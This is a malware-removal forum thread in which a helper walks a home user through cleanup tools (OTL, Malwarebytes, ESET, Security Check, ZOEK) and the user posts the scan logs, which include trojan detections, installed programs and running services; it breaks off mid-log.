Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0031-ABCDEFFEDCBA}\ not found.

Starting removal of ActiveX control {DF780F87-FF2B-4DF8-92D0-73DB16A1543A}

C:\Windows\Downloaded Program Files\popcaploader.inf not found.

Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Code Store Database\Distribution Units\{DF780F87-FF2B-4DF8-92D0-73DB16A1543A}\ deleted successfully.

Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{DF780F87-FF2B-4DF8-92D0-73DB16A1543A}\ not found.

Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{DF780F87-FF2B-4DF8-92D0-73DB16A1543A}\ not found.

Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{DF780F87-FF2B-4DF8-92D0-73DB16A1543A}\ not found.

Starting removal of ActiveX control {E2883E8F-472F-4FB0-9522-AC9BF37916A7}

C:\Windows\Downloaded Program Files\gp.inf not found.

Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Code Store Database\Distribution Units\{E2883E8F-472F-4FB0-9522-AC9BF37916A7}\ deleted successfully.

Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E2883E8F-472F-4FB0-9522-AC9BF37916A7}\ not found.

Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{E2883E8F-472F-4FB0-9522-AC9BF37916A7}\ not found.

Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E2883E8F-472F-4FB0-9522-AC9BF37916A7}\ not found.

OTL by OldTimer - Version 3.2.69.0 log created on 10292014_121141

Thank you

[Naathim]

OK, any outstanding issues?



Scan with Malwarebytes' Anti-Malware

Please download Malwarebytes Anti-Malware and save it to your desktop.

• Install the progam and select update.
• Once updated, click the Settings tab, in the left panel choose Detctions & protection and tick Scan for rootkits.
• Click the Scan tab, choose Threat Scan is checked and click Scan Now.
• If threats are detected, click the Apply Actions button. You will now be prompted to reboot. Click Yes.
• Upon completion of the scan (or after the reboot), click the History tab.
• Click Application Logs and double-click the Scan Log.
• At the bottom click Export and choose Text file.

Save the file to your desktop and include its content in your next reply.



Scan with ESET Online Scanner

This step can only be done using Internet Explorer, Google Chrome or Mozilla Firefox.
Temporary disable your AntiVirus and AntiSpyware protection - instructions here.
Please visit ESET Online Scanner website.
Click there Run ESET Online Scanner.

If using Internet Explorer:

• Accept the Terms of Use and click Start.
• Allow the running of add-on.

If using Mozilla Firefox or Google Chrome:

• Download esetsmartinstaller_enu.exe that you'll be given link to.
• Double click esetsmartinstaller_enu.exe.
• Allow the Terms of Use and click Start.

To perform the scan:

• Make sure that Enable detecion of potentially unwanted applications is checked.
• In the Advanced Settings dropdown menu:
  • Make sure that Remove found threats is unchecked.
  • Scan archives is checked.
  • Scan for potentially unsafe applications and Enable Anti-Stealth technology are checked.
  • Use custom proxy settings is unchecked.
• Click Start
• The program will begin to download it's virus database. The speed may vary depending on your Internet connection.
• When completed, the program will begin to scan. This may take several hours. Please, be patient.
• Do not do anything on your machine as it may interrupt the scan.
• When the scan is done, click Finish.
• A logfile will be created at C:\Program Files (x86)\ESET\ESET Online Scanner. Open it using Notepad.

Please include this logfile in your next reply.
Don't forget to re-enable previously switched-off protection software!



Scan with Security Check

Please download Security Check by Screen317 and save it to your desktop.

• Right-click on icon and select Run as Administrator to start the tool.
• Follow onscreen instructions inside the black box. This scan won't take long.
• Soon a notepad document called checkup.txt will open automaticaly.

Please include the content of that document.

[adh]

Ran the scans you requested. One thing I noticed, even though I only visited a couple of websites today (5) over 75 different sites I have never been to showed up in my history for today.

here are the logs requested.

Malwarebytes

Malwarebytes Anti-Malware

www.malwarebytes.org

Scan Date: 10/29/2014

Scan Time: 12:52:01 PM

Logfile: MBAM log.txt

Administrator: Yes

Version: 2.00.3.1025

Malware Database: v2014.10.29.06

Rootkit Database: v2014.10.22.01

License: Premium

Malware Protection: Enabled

Malicious Website Protection: Enabled

Self-protection: Disabled

OS: Windows 7 Service Pack 1

CPU: x64

File System: NTFS

User: ADH

Scan Type: Threat Scan

Result: Completed

Objects Scanned: 500945

Time Elapsed: 12 min, 19 sec

Memory: Enabled

Startup: Enabled

Filesystem: Enabled

Archives: Enabled

Rootkits: Enabled

Heuristics: Enabled

PUP: Enabled

PUM: Enabled

Processes: 0

(No malicious items detected)

Modules: 0

(No malicious items detected)

Registry Keys: 0

(No malicious items detected)

Registry Values: 0

(No malicious items detected)

Registry Data: 0

(No malicious items detected)

Folders: 0

(No malicious items detected)

Files: 0

(No malicious items detected)

Physical Sectors: 0

(No malicious items detected)

(end)

ESET

ESETSmartInstaller@High as downloader log:

all ok

# product=EOS

# version=8

# OnlineScannerApp.exe=1.0.0.1

# OnlineScanner.ocx=1.0.0.7623

# api_version=3.0.2

# EOSSerial=0110d3d997d11e4a8876317b4b115a50

# engine=20843

# end=finished

# remove_checked=false

# archives_checked=true

# unwanted_checked=true

# unsafe_checked=true

# antistealth_checked=true

# utc_time=2014-10-30 12:35:50

# local_time=2014-10-29 07:35:50 (-0600, Central Daylight Time)

# country="United States"

# lang=1033

# osver=6.1.7601 NT Service Pack 1

# compatibility_mode_1='Norton 360'

# compatibility_mode=3598 16777213 100 100 787053 165205446 0 0

# compatibility_mode_1=''

# compatibility_mode=5893 16776574 100 94 39991395 166172800 0 0

# scanned=271469

# found=4

# cleaned=0

# scan_time=6102

sh=3943F774A5C7882625F4712FDFB0748888BF73ED ft=1 fh=129698ed833729a2 vn="a variant of MSIL/Kryptik.AKY trojan" ac=I fn="C:\Users\ADH.Heathman-PC\AppData\LocalLow\grbfa.dll"

sh=941BC9D55FA81B95CA1ED92D35DEBB800D776D45 ft=1 fh=412e0aa5e7b09979 vn="a variant of MSIL/Kryptik.AKY trojan" ac=I fn="C:\Users\ADH.Heathman-PC\AppData\LocalLow\srayb.dll"

sh=D39B163A9D654306C53C4C7F33A57CFB19F97CEE ft=0 fh=0000000000000000 vn="a variant of Win32/Bundled.Toolbar.Ask potentially unsafe application" ac=I fn="C:\Users\Heathman\AppData\Local\Downloaded Installations\{22FA2064-F3D1-4F3E-8664-BA980ABA3128}\PCmover Professional.msi"

sh=D39B163A9D654306C53C4C7F33A57CFB19F97CEE ft=0 fh=0000000000000000 vn="a variant of Win32/Bundled.Toolbar.Ask potentially unsafe application" ac=I fn="C:\Windows\Installer\1409584a.msi"

Security check

Results of screen317's Security Check version 0.99.89

Windows 7 Service Pack 1 x64 (UAC is enabled)

Internet Explorer 10 Out of date!

``````````````Antivirus/Firewall Check:``````````````

Windows Firewall Enabled!

Norton 360 Premier Edition

WMI entry may not exist for antivirus; attempting automatic update.

`````````Anti-malware/Other Utilities Check:`````````

Java 6 Update 25

Java version out of Date!

Adobe Flash Player 15.0.0.152

Adobe Reader 10.1.12 Adobe Reader out of Date!

Google Chrome 38.0.2125.104

Google Chrome 38.0.2125.111

````````Process Check: objlist.exe by Laurent````````

Norton ccSvcHst.exe

Malwarebytes Anti-Malware mbamservice.exe

Malwarebytes Anti-Malware mbam.exe

Malwarebytes Anti-Malware mbamscheduler.exe

`````````````````System Health check`````````````````

Total Fragmentation on Drive C: 7%

````````````````````End of Log``````````````````````

[adh]

Also get the following popup when I log into one of my user accounts. I'm not sure if due to infection.

RegSvr32

The module “C:\Users\Heathman\AppData\Local\AppleComputer\goopdate_unsigned.dll failed to load.

Make sure the binary is stored at the specified path or debug it to check for problems with the binary or dependent .DLL files.

The specified module could not be found.

[Naathim]

Update outdated software

Staying always updated is crucial, not only for your operating system, but also for any third-party installed software.

Your logs clearly indicate that some of your software needs updating.

Updating Internet Explorer manually

IE is an integrated part of Windows core. Leaving it without updates is a great risk for your data security, even if you don't use it!

• Visit THISwebsite.
• You will find there IE 11 to be downloaded nad installed.

Updating Java manually

• Click the Start button
• Click Control Panel
• Double click Java - Looks like a coffee cup. You may have to switch to Classical View to see it.
• Click the Update tab
• Click Update Now
• Allow any updates to be downloaded and installed.
• If prompted (during the installation) to also install ASK toolbar, leave this unchecked - Ask does not have a good reputation.
• From Control panel also please remove any older versions of Java - do not leave them installed!.

Updating Adobe manually

• Visit Adobe website.
• You will see a download option there for the newest Adobe Acrobat version.
• In the center part you will be prompted to install McAfee Security Scan Plus or Google Chrome (depending on your locale) as a free program. This is foistware. Remember to leave the box for it UNCHECKED.
• Click on Install, save the file to a convenient location, double-click it and follow the prompts.

Please remember to keep your software always updated. It's crucial as the bugs are still discovered and patched by the vendors.

Scan with ZOEK

Please download ZOEK by Smeenk and save it to your desktop (preferred version is the *.exe one)

Temporary disable your AntiVirus and AntiSpyware protection - instructions here.

• Right-click on icon and select Run as Administrator to start the tool.
• Wait patiently until the main console will appear, it may take a minute or two.
• In the main box please paste in the following script:

  createsrpoint;process;services-list;systemspecs;startupall;skipfix-iedefaults;firefoxlook;chromelook;filesrcm;installedprogs;

• Make sure that Scan All Users option is checked.
• Push Run Script and wait patiently. The scan may take a couple of minutes.
• When the scan completes, a zoek-results logfile should open in notepad.
• If a reboot is needed, it will be opened after it. You may also find it at your main drive (usually C:\ drive)

Please include its content in your next reply.

Don't forget to re-enable your switched-off protection software!

[adh]

Good morning, I updated the software as requested and ran the scan. Had a couple of malicious site blocks this morning referencing the explore.exe file as well as large history of websites visited.

Here is the log you requested. Thank you

Zoek.exe v5.0.0.0 Updated 29-10-2014

Tool run by ADH on Thu 10/30/2014 at 7:09:05.22.

Microsoft Windows 7 Home Premium 6.1.7601 Service Pack 1 x64

Running in: Normal Mode Internet Access Detected

Launched: C:\Users\ADH.Heathman-PC\Downloads\zoek.exe [scan all users] [script inserted]

==== System Restore Info ======================

10/30/2014 7:10:29 AM Zoek.exe System Restore Point Created Succesfully.

==== Installed Programs ======================

Adobe AIR

Adobe Flash Player 15 ActiveX

Adobe Flash Player 15 Plugin

Adobe Reader XI (11.0.09)

Amazing Adventures The Forgotten Dynasty

Amazon Links

Amazon MP3 Downloader 1.0.17

Apple Application Support

Apple Mobile Device Support

Apple Software Update

Bejeweled 3

Big City Adventure San Francisco

Big City Adventure Sydney

Bonjour

Castle - Never Judge a Book by Its Cover

ContentHD

Contents

Corel Digital Studio SE

D3DX10

Definition Update for Microsoft Office 2010 (KB982726) 32-Bit Edition

DeviceIO

DFPro

Escape The Emerald Star

Escape Whisper Valley

FATE - The Traitor Soul

Google Chrome

Google Earth Plug-in

Google Toolbar for Internet Explorer

Google Update Helper

Hoyle Card Games Classic

Hoyle Casino Classic

ICA

Intel PROSet Wireless

Intel® Management Engine Components

Intel® Processor Graphics

Intel® PROSet/Wireless WiFi Software

Intel® Rapid Storage Technology

Intel® WiDi

Intel® Wireless Display

IPM_OEM

ISCOM

iTunes

Java 8 Update 25

Java Auto Updater

Jewel Quest Mysteries Curse of the Emerald Tear

Jewel Quest Mysteries The Seventh Gate

Jewel Quest Mysteries Trail of the Midnight Heart

JMicron Flash Media Controller Driver

Junk Mail filter update

Label@Once 1.0

Letters from Nowhere 2

Malwarebytes Anti-Malware version 2.0.3.1025

Mesh Runtime

Microsoft .NET Framework 4.5.1

Microsoft Application Error Reporting

Microsoft Office Access MUI (English) 2010

Microsoft Office Access Setup Metadata MUI (English) 2010

Microsoft Office Excel MUI (English) 2010

Microsoft Office Office 64-bit Components 2010

Microsoft Office OneNote MUI (English) 2010

Microsoft Office Outlook MUI (English) 2010

Microsoft Office PowerPoint MUI (English) 2010

Microsoft Office Professional 2010

Microsoft Office Proof (English) 2010

Microsoft Office Proof (French) 2010

Microsoft Office Proof (Spanish) 2010

Microsoft Office Proofing (English) 2010

Microsoft Office Publisher MUI (English) 2010

Microsoft Office Shared 64-bit MUI (English) 2010

Microsoft Office Shared 64-bit Setup Metadata MUI (English) 2010

Microsoft Office Shared MUI (English) 2010

Microsoft Office Shared Setup Metadata MUI (English) 2010

Microsoft Office Single Image 2010

Microsoft Office Word MUI (English) 2010

Microsoft Silverlight

Microsoft SQL Server 2005 Compact Edition [ENU]

Microsoft Visual C++ 2005 Redistributable

Microsoft Visual C++ 2005 Redistributable (x64)

Microsoft Visual C++ 2008 Redistributable - x64 9.0.21022

Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17

Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148

Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161

Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022

Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17

Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148

Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161

Microsoft Visual C++ 2010 x86 Redistributable - 10.0.30319

MLE

More Games - WildTangent

MotoCast

Motorola Device Manager

Motorola Device Software Update

MOTOROLA MEDIA LINK

Motorola Mobile Drivers Installation 6.3.0

MSVCRT

MSVCRT_amd64

MSXML 4.0 SP2 (KB954430)

MSXML 4.0 SP2 (KB973688)

MSXML 4.0 SP3 Parser

MSXML 4.0 SP3 Parser (KB2721691)

MSXML 4.0 SP3 Parser (KB2758694)

Mystery P.I. - Stolen in San Francisco

Mystery P.I. - The New York Fortune

National Geographic Collector's Pack

Norton 360

Norton PC Checkup

NVIDIA 3D Vision Controller Driver

NVIDIA 3D Vision Controller Driver 296.10

NVIDIA Control Panel 296.10

NVIDIA Graphics Driver 296.10

NVIDIA Install Application

NVIDIA Optimus 1.7.11

NVIDIA PhysX

NVIDIA PhysX System Software 9.12.0213

NVIDIA Update Components

PCmover Professional

Penguins

Plants vs. Zombies - Game of the Year

PlayReady PC Runtime amd64

PlayReady PC Runtime x86

Polar Bowler

PureHD

Realtek Ethernet Controller Driver

Realtek High Definition Audio Driver

Renesas Electronics USB 3.0 Host Controller Driver

RollerCoaster Tycoon 3: Platinum

Samsung CLP-310 Series

Security Update for Microsoft .NET Framework 4.5.1 (KB2894854v2)

Security Update for Microsoft .NET Framework 4.5.1 (KB2898869)

Security Update for Microsoft .NET Framework 4.5.1 (KB2901126)

Security Update for Microsoft .NET Framework 4.5.1 (KB2931368)

Security Update for Microsoft .NET Framework 4.5.1 (KB2972107)

Security Update for Microsoft .NET Framework 4.5.1 (KB2972216)

Security Update for Microsoft .NET Framework 4.5.1 (KB2979578v2)

Security Update for Microsoft Office 2010 (KB2553284) 32-Bit Edition

Security Update for Microsoft Office 2010 (KB2687423) 32-Bit Edition

Security Update for Microsoft Office 2010 (KB2810073) 32-Bit Edition

Security Update for Microsoft Office 2010 (KB2850016) 32-Bit Edition

Security Update for Microsoft Office 2010 (KB2880971) 32-Bit Edition

Security Update for Microsoft Office 2010 (KB2881071) 32-Bit Edition

Security Update for Microsoft Word 2010 (KB2883013) 32-Bit Edition

Service Pack 2 for Microsoft Office 2010 (KB2687455) 32-Bit Edition

Setup

Share

Share64

Skype Launcher

Synaptics Pointing Device Driver

Tales of Lagoona

TomTom HOME

TomTom HOME Visual Studio Merge Modules

Toshiba App Place

TOSHIBA Application Installer

TOSHIBA Assist

TOSHIBA Blu-ray Disc Player

Toshiba Book Place

TOSHIBA Bulletin Board

TOSHIBA Disc Creator

TOSHIBA eco Utility

TOSHIBA Face Recognition

TOSHIBA Flash Cards Support Utility

TOSHIBA Hardware Setup

TOSHIBA HDD Protection

TOSHIBA HDD/SSD Alert

Toshiba Laptop Checkup

TOSHIBA Media Controller

TOSHIBA Media Controller Plug-in

Toshiba Online Backup

TOSHIBA PC Health Monitor

TOSHIBA Quality Application

TOSHIBA Recovery Media Creator

TOSHIBA ReelTime

TOSHIBA Resolution+ Plug-in for Windows Media Player

TOSHIBA Service Station

TOSHIBA Sleep Utility

TOSHIBA Supervisor Password

TOSHIBA Value Added Package

TOSHIBA Web Camera Application

TOSHIBA Wireless Display Monitor

TOSHIBARegistration

TurboTax 2009

TurboTax 2009 WinPerFedFormset

TurboTax 2009 WinPerReleaseEngine

TurboTax 2009 WinPerTaxSupport

TurboTax 2009 wmoiper

TurboTax 2009 wrapper

TurboTax 2010

TurboTax 2010 WinPerFedFormset

TurboTax 2010 WinPerReleaseEngine

TurboTax 2010 WinPerTaxSupport

TurboTax 2010 wmoiper

TurboTax 2010 wrapper

TurboTax 2011

TurboTax 2011 WinPerFedFormset

TurboTax 2011 WinPerReleaseEngine

TurboTax 2011 WinPerTaxSupport

TurboTax 2011 wmoiper

TurboTax 2011 wrapper

TurboTax 2012

TurboTax 2012 WinPerFedFormset

TurboTax 2012 WinPerReleaseEngine

TurboTax 2012 WinPerTaxSupport

TurboTax 2012 wmoiper

TurboTax 2012 wrapper

TurboTax 2013

TurboTax 2013 WinPerFedFormset

TurboTax 2013 WinPerReleaseEngine

TurboTax 2013 WinPerTaxSupport

TurboTax 2013 wmoiper

TurboTax 2013 wrapper

Update for Microsoft Access 2010 (KB2553446) 32-Bit Edition

Update for Microsoft Excel 2010 (KB2889836) 32-Bit Edition

Update for Microsoft Filter Pack 2.0 (KB2878281) 32-Bit Edition

Update for Microsoft InfoPath 2010 (KB2817369) 32-Bit Edition

Update for Microsoft Office 2010 (KB2494150)

Update for Microsoft Office 2010 (KB2589298) 32-Bit Edition

Update for Microsoft Office 2010 (KB2589352) 32-Bit Edition

Update for Microsoft Office 2010 (KB2589375) 32-Bit Edition

Update for Microsoft Office 2010 (KB2597087) 32-Bit Edition

Update for Microsoft Office 2010 (KB2687502) 32-Bit Edition

Update for Microsoft Office 2010 (KB2760598) 32-Bit Edition

Update for Microsoft Office 2010 (KB2760631) 32-Bit Edition

Update for Microsoft Office 2010 (KB2794737) 32-Bit Edition

Update for Microsoft Office 2010 (KB2825635) 32-Bit Edition

Update for Microsoft Office 2010 (KB2837581) 32-Bit Edition

Update for Microsoft Office 2010 (KB2837606) 32-Bit Edition

Update for Microsoft Office 2010 (KB2878252) 32-Bit Edition

Update for Microsoft Office 2010 (KB2881028) 32-Bit Edition

Update for Microsoft OneNote 2010 (KB2837595) 32-Bit Edition

Update for Microsoft Outlook 2010 (KB2687567) 32-Bit Edition

Update for Microsoft PowerPoint 2010 (KB2837579) 32-Bit Edition

Update for Microsoft SharePoint Workspace 2010 (KB2760601) 32-Bit Edition

Update for Microsoft Visio 2010 (KB2880526) 32-Bit Edition

Update for Microsoft Visio Viewer 2010 (KB2837587) 32-Bit Edition

Update Installer for WildTangent Games App

Utility Common Driver

Vacation Quest - Australia

Vacation Quest - The Hawaiian Islands

VIO

WildTangent Games

WildTangent Games App (Toshiba Games)

Windows Live Communications Platform

Windows Live Essentials

Windows Live ID Sign-in Assistant

Windows Live Installer

Windows Live Language Selector

Windows Live Mail

Windows Live Mesh

Windows Live Mesh ActiveX Control for Remote Connections

Windows Live Messenger

Windows Live MIME IFilter

Windows Live Movie Maker

Windows Live Photo Common

Windows Live Photo Gallery

Windows Live PIMT Platform

Windows Live Remote Client

Windows Live Remote Client Resources

Windows Live Remote Service

Windows Live Remote Service Resources

Windows Live SOXE

Windows Live SOXE Definitions

Windows Live UX Platform

Windows Live UX Platform Language Pack

Windows Live Writer

Windows Live Writer Resources

Zuma's Revenge

==== Running Processes ======================

C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe

C:\Program Files (x86)\Motorola Media Link\Lite\NServiceEntry.exe

C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe

C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe

C:\Program Files (x86)\Motorola Mobility\Motorola Device Manager\MotoHelperService.exe

C:\Program Files (x86)\Norton 360\Engine\21.6.0.32\N360.exe

C:\Program Files (x86)\PC Checkup\SymcPCCULaunchSvc.exe

C:\Program Files (x86)\Norton PC Checkup\Engine\2.0.13.11\ccSvcHst.exe

c:\Program Files (x86)\Common Files\Protexis\License Service\PsiService_2.exe

C:\Program Files (x86)\Motorola\MotForwardDaemon\ForwardDaemon.exe

C:\Program Files (x86)\TomTom HOME 2\TomTomHOMEService.exe

c:\Program Files (x86)\Common Files\Ulead Systems\UDSS\UDSS.exe

C:\Program Files (x86)\Malwarebytes Anti-Malware\mbam.exe

C:\Program Files (x86)\Norton PC Checkup\Engine\2.0.13.11\ccSvcHst.exe

C:\Program Files (x86)\Motorola Mobility\Motorola Device Manager\MotoHelperAgent.exe

C:\Program Files (x86)\Norton 360\Engine\21.6.0.32\N360.exe

C:\Program Files (x86)\TOSHIBA\Utilities\KeNotify.exe

C:\Windows\Samsung\PanelMgr\SSMMgr.exe

C:\Program Files (x86)\iTunes\iTunesHelper.exe

C:\Program Files (x86)\TOSHIBA\widimon\widimon.exe

C:\Program Files (x86)\Common Files\Intuit\Update Service\IntuitUpdateService.exe

C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe

C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\LMS.exe

C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Update Core\daemonu.exe

C:\Program Files (x86)\Intel\Intel® Management Engine Components\UNS\UNS.exe

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbarUser_32.exe

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe

C:\Users\ADH.Heathman-PC\Downloads\zoek.exe

C:\windows\SysWOW64\cmd.exe

C:\windows\SysWOW64\cmd.exe

C:\windows\SysWOW64\cmd.exe

==== Services (whitelist) ======================

Powered by E Dev

R2 - [AdobeARMservice] - Adobe Acrobat Update Service - "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe"

R2 - [Apple Mobile Device] - Apple Mobile Device - "C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe"

R2 - [bonjour Service] - Bonjour Service - "C:\Program Files\Bonjour\mDNSResponder.exe"

R2 - [DeviceMonitorService] - DeviceMonitorService - "C:\Program Files (x86)\Motorola Media Link\Lite\NServiceEntry.exe"

R2 - [EvtEng] - Intel® PROSet/Wireless Event Log - C:\Program Files\Intel\WiFi\bin\EvtEng.exe

R2 - [intuitUpdateService] - Intuit Update Service - "C:\Program Files (x86)\Common Files\Intuit\Update Service\IntuitUpdateService.exe"

R2 - [intuitUpdateServiceV4] - Intuit Update Service v4 - "C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe"

R2 - [LMS] - Intel® Management and Security Application Local Management Service - C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\LMS.exe

R2 - [MBAMScheduler] - MBAMScheduler - "C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe"

R2 - [MBAMService] - MBAMService - "C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe"

R2 - [Motorola Device Manager] - Motorola Device Manager Service - C:\Program Files (x86)\Motorola Mobility\Motorola Device Manager\MotoHelperService.exe

R2 - [msiserver] - Windows Installer - C:\windows\system32\msiexec.exe /V

R2 - [N360] - Norton 360 - "C:\Program Files (x86)\Norton 360\Engine\21.6.0.32\N360.exe" /s "N360" /m "C:\Program Files (x86)\Norton 360\Engine\21.6.0.32\diMaster.dll" /prefetch:1

R2 - [Norton PC Checkup Application Launcher] - Norton PC Checkup Application Launcher - C:\Program Files (x86)\PC Checkup\SymcPCCULaunchSvc.exe /s

R2 - [NVSvc] - NVIDIA Display Driver Service - C:\windows\system32\nvvsvc.exe

R2 - [nvUpdatusService] - NVIDIA Update Service Daemon - C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Update Core\daemonu.exe

R2 - [PCCUJobMgr] - Common Client Job Manager Service - "C:\Program Files (x86)\Norton PC Checkup\Engine\2.0.13.11\ccSvcHst.exe" /s "PCCUJobMgr" /m "C:\Program Files (x86)\Norton PC Checkup\Engine\2.0.13.11\diMaster.dll" /prefetch:1

R2 - [PSI_SVC_2] - Protexis Licensing V2 - "c:\Program Files (x86)\Common Files\Protexis\License Service\PsiService_2.exe"

R2 - [RegSrvc] - Intel® PROSet/Wireless Registry Service - C:\Program Files\Common Files\Intel\WirelessCommon\RegSrvc.exe

R2 - [Thpsrv] - TOSHIBA HDD Protection - C:\windows\system32\ThpSrv.exe

R2 - [TODDSrv] - TOSHIBA Optical Disc Drive Service - C:\windows\system32\TODDSrv.exe

R2 - [TosCoSrv] - TOSHIBA Power Saver - "C:\Program Files\TOSHIBA\Power Saver\TosCoSrv.exe"

R2 - [TOSHIBA eco Utility Service] - TOSHIBA eco Utility Service - "C:\Program Files\TOSHIBA\TECO\TecoService.exe"

R2 - [uDSS] - UDSS - "c:\Program Files (x86)\Common Files\Ulead Systems\UDSS\UDSS.exe"

R2 - [uNS] - Intel® Management and Security Application User Notification Service - "C:\Program Files (x86)\Intel\Intel® Management Engine Components\UNS\UNS.exe"

R2 - [wlidsvc] - Windows Live ID Sign-in Assistant - "C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE"

R2 - [WMPNetworkSvc] - Windows Media Player Network Sharing Service - "C:\Program Files\Windows Media Player\wmpnetwk.exe"

R3 - [iPod Service] - iPod Service - "C:\Program Files\iPod\bin\iPodService.exe"

R3 - [TMachInfo] - TMachInfo - C:\Program Files (x86)\TOSHIBA\TOSHIBA Service Station\TMachInfo.exe

R3 - [TOSHIBA HDD SSD Alert Service] - TOSHIBA HDD SSD Alert Service - "C:\Program Files\TOSHIBA\TOSHIBA HDD SSD Alert\TosSmartSrv.exe"

R3 - [TPCHSrv] - TPCH Service - "C:\Program Files\TOSHIBA\TPHM\TPCHSrv.exe"

R3 - [VSS] - Volume Shadow Copy - C:\windows\system32\vssvc.exe

S2 - [clr_optimization_v4.0.30319_32] - Microsoft .NET Framework NGEN v4.0.30319_X86 - C:\windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe

S2 - [clr_optimization_v4.0.30319_64] - Microsoft .NET Framework NGEN v4.0.30319_X64 - C:\windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe

S2 - [gupdate] - Google Update Service (gupdate) - "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /svc

S2 - [sppsvc] - Software Protection - C:\windows\system32\sppsvc.exe

S2 - [WSearch] - Windows Search - C:\windows\system32\SearchIndexer.exe /Embedding

S3 - [AdobeFlashPlayerUpdateSvc] - Adobe Flash Player Update Service - C:\windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe

S3 - [ALG] - Application Layer Gateway Service - C:\windows\System32\alg.exe

S3 - [aspnet_state] - ASP.NET State Service - C:\windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exe

S3 - [COMSysApp] - COM+ System Application - C:\windows\system32\dllhost.exe /Processid:{02D4B3F1-FD88-11D1-960D-00805FC79235}

S3 - [ehRecvr] - Windows Media Center Receiver Service - C:\windows\ehome\ehRecvr.exe

S3 - [ehSched] - Windows Media Center Scheduler Service - C:\windows\ehome\ehsched.exe

S3 - [Fax] - Fax - C:\windows\system32\fxssvc.exe

S3 - [FontCache3.0.0.0] - Windows Presentation Foundation Font Cache 3.0.0.0 - C:\windows\Microsoft.Net\Framework64\v3.0\WPF\PresentationFontCache.exe

S3 - [GamesAppService] - GamesAppService - "C:\Program Files (x86)\WildTangent Games\App\GamesAppService.exe"

S3 - [gupdatem] - Google Update Service (gupdatem) - "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /medsvc

S3 - [gusvc] - Google Software Updater - "C:\Program Files (x86)\Google\Common\Google Updater\GoogleUpdaterService.exe"

S3 - [iEEtwCollectorService] - Internet Explorer ETW Collector Service - C:\windows\system32\IEEtwCollector.exe /V

S3 - [MSDTC] - Distributed Transaction Coordinator - C:\windows\System32\msdtc.exe

S3 - [MyWiFiDHCPDNS] - Wireless PAN DHCP Server - C:\Program Files\Intel\WiFi\bin\PanDhcpDns.exe

S3 - [ose] - Office Source Engine - "C:\Program Files (x86)\Common Files\Microsoft Shared\Source Engine\OSE.EXE"

S3 - [osppsvc] - Office Software Protection Platform - "C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE"

S3 - [PerfHost] - Performance Counter DLL Host - C:\windows\SysWow64\perfhost.exe

S3 - [RpcLocator] - Remote Procedure Call (RPC) Locator - C:\windows\system32\locator.exe

S3 - [sNMPTRAP] - SNMP Trap - C:\windows\System32\snmptrap.exe

S3 - [TrustedInstaller] - Windows Modules Installer - C:\windows\servicing\TrustedInstaller.exe

S3 - [vds] - Virtual Disk - C:\windows\System32\vds.exe

S3 - [WatAdminSvc] - Windows Activation Technologies Service - C:\windows\system32\Wat\WatAdminSvc.exe

S3 - [wbengine] - Block Level Backup Engine Service - "C:\windows\system32\wbengine.exe"

S3 - [wmiApSrv] - WMI Performance Adapter - C:\windows\system32\wbem\WmiApSrv.exe

S4 - [clr_optimization_v2.0.50727_32] - Microsoft .NET Framework NGEN v2.0.50727_X86 - C:\windows\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe

S4 - [clr_optimization_v2.0.50727_64] - Microsoft .NET Framework NGEN v2.0.50727_X64 - C:\windows\Microsoft.NET\Framework64\v2.0.50727\mscorsvw.exe

S4 - [wlcrasvc] - Windows Live Mesh remote connections service - "C:\Program Files\Windows Live\Mesh\wlcrasvc.exe"

==== System Specs ======================

Windows: Windows 7 Home Premium Edition (64-bit) Service Pack 1 (Build 7601)

Memory (RAM): 8099 MB

CPU Info: Intel® Core i5-2450M CPU @ 2.50GHz

CPU Speed: 2519.7 MHz

Sound Card: Speakers (Realtek High Definiti |

